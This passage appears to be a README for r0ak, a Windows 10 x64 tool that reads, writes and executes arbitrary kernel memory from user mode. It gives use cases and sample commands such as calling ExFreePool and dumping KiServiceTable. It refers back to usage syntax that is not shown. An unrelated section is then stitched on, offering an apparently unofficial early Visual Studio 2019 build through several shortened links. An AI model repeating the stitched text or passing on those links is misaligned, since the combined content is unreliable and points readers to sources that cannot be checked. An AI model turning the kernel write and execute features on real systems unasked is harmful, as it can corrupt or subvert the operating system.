Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should set up the _NT_SYMBOL_PATH variable pointing to an appropriate symbol server and cache location.
It is assumed that an IT expert or other troubleshooter who needs to read/write/execute kernel memory (and knows which kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.
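For reference, a typical configuration points _NT_SYMBOL_PATH at Microsoft's public symbol server with a local cache directory (the C:\Symbols path below is only an example):

C:\>setx _NT_SYMBOL_PATH SRV*C:\Symbols*https://msdl.microsoft.com/download/symbols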

Use Cases

  • Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that's leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer?
  • Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize.
  • Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable.

These are only a few examples — all Ring 0 addresses are accepted, either by module!symbol syntax or by directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.
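Based on the usage syntax shown earlier, invocations for these scenarios might look roughly like the following; the pool address and read sizes are hypothetical, and symbol availability can vary between Windows builds:

C:\>r0ak.exe --execute ntoskrnl.exe!ExFreePool 0xFFFFA804DEADB000
C:\>r0ak.exe --read ntoskrnl.exe!KdPrintCircularBuffer 0x1000
C:\>r0ak.exe --read ntoskrnl.exe!KeKernelStackSize 8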

Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.

Visual Studio 2019

Alright, since it's the weekend (hope nobody is watching), you can get an early version of Visual Studio 2019 here: https://t.co/aCKX6HhyWP


channel  — https://t.co/kUX13gca5H

catalog — https://t.co/OG4yKQHy9H

setup — https://t.co/aq0PFucEal

installer — https://t.co/K7IsnKx3jD